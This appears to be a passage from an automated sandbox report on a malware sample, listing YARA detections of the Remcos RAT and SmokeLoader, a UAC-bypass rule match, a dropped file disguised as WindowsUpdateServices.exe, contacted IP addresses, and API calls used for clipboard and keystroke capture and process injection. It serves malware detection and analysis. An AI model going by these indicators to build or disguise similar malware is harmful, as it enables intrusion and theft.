                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                        Source: DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2470723461.00007FFDFB3D0000.00000004.00000001.01000000.0000001A.sdmp, DE5A.exe, 00000016.00000002.2472109218.00007FFDFF308000.00000004.00000001.01000000.0000001B.sdmp, DE5A.exe, 00000027.00000003.2468424463.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2593155215.00007FFDFBAA0000.00000004.00000001.01000000.0000002A.sdmp, DE5A.exe, 0000002E.00000002.2595440875.00007FFE00568000.00000004.00000001.01000000.0000002B.sdmpString found in binary or memory: https://www.openssl.org/H
                        Source: DE5A.exe, 00000016.00000003.2413911637.000001F0123A1000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466005224.000001F0121C0000.00000004.00001000.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2413695668.000001F01239C000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2479834858.000001E8E72F9000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2579425676.000001E8E6E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                        Source: DE5A.exe, DE5A.exe, 00000016.00000002.2470814485.00007FFDFB8F7000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.python.org/psf/license/
                        Source: DE5A.exe, 00000016.00000002.2470814485.00007FFDFB7F2000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.python.org/psf/license/)
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
                        Source: DE5A.exe, 00000016.00000002.2466580305.000001F0127A5000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466223429.000001F01232A000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495670769.000001E8E7A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                        Source: unknownHTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 65.108.69.93:443 -> 192.168.2.4:49743 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Yara detected SmokeLoader
                        Source: Yara matchFile source: 0000000F.00000002.2017597409.0000000000901000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2017513277.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeCode function: 0_2_00405582 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405582
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A0F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00A0F7C7
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A0F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,13_2_00A0F7C7
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001BF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,20_2_001BF7C7
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A0F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00A0F55C
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009FA635 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,10_2_009FA635
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A29FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00A29FD2
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A29FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,13_2_00A29FD2
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001D9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,20_2_001D9FD2

                        E-Banking Fraud

                        barindex
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2542712079.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2904070426.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: DE5A.exe PID: 5632, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: bound.exe PID: 1860, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000000F.00000002.2017597409.0000000000901000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                        Source: 0000000F.00000002.2017513277.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                        Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: Process Memory Space: DE5A.exe PID: 5632, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: bound.exe PID: 1860, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 15_2_0040259B NtEnumerateKey,15_2_0040259B
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 15_2_004014B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_004014B0
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 15_2_004014CD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_004014CD
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 15_2_004014E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_004014E0
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 15_2_004014F3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_004014F3
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 15_2_004014BB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_004014BB
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A04763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,10_2_00A04763
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009F1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_009F1B4D
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeCode function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040348F
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009FF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_009FF20D
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009FF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,13_2_009FF20D
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001AF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,20_2_001AF20D
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeCode function: 0_2_00406AFA0_2_00406AFA
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009B801710_2_009B8017
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_0099E1F010_2_0099E1F0
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009AE14410_2_009AE144
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009922AD10_2_009922AD
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009B22A210_2_009B22A2
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009CA26E10_2_009CA26E
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009AC62410_2_009AC624
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A1C8A410_2_00A1C8A4
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009CE87F10_2_009CE87F
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009C6ADE10_2_009C6ADE
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A02A0510_2_00A02A05
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009F8BFF10_2_009F8BFF
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009ACD7A10_2_009ACD7A
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009BCE1010_2_009BCE10
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009C715910_2_009C7159
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_0099924010_2_00999240
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A2531110_2_00A25311
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009996E010_2_009996E0
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009B170410_2_009B1704
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009B1A7610_2_009B1A76
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009B7B8B10_2_009B7B8B
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00999B6010_2_00999B60
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009B7DBA10_2_009B7DBA
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009B1D2010_2_009B1D20
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009B1FE710_2_009B1FE7
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009B801713_2_009B8017
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_0099E1F013_2_0099E1F0
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009B22A213_2_009B22A2
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009CA26E13_2_009CA26E
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_0099226D13_2_0099226D
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009AC4B713_2_009AC4B7
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A1C8A413_2_00A1C8A4
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009CE87F13_2_009CE87F
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009C6ADE13_2_009C6ADE
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A02A0513_2_00A02A05
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009F8BFF13_2_009F8BFF
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009BCE1013_2_009BCE10
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009C715913_2_009C7159
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_0099924013_2_00999240
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A2531113_2_00A25311
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009996E013_2_009996E0
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009B170413_2_009B1704
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009B1A7613_2_009B1A76
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009B7B8B13_2_009B7B8B
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00999B6013_2_00999B60
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009B7DBA13_2_009B7DBA
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009B1D2013_2_009B1D20
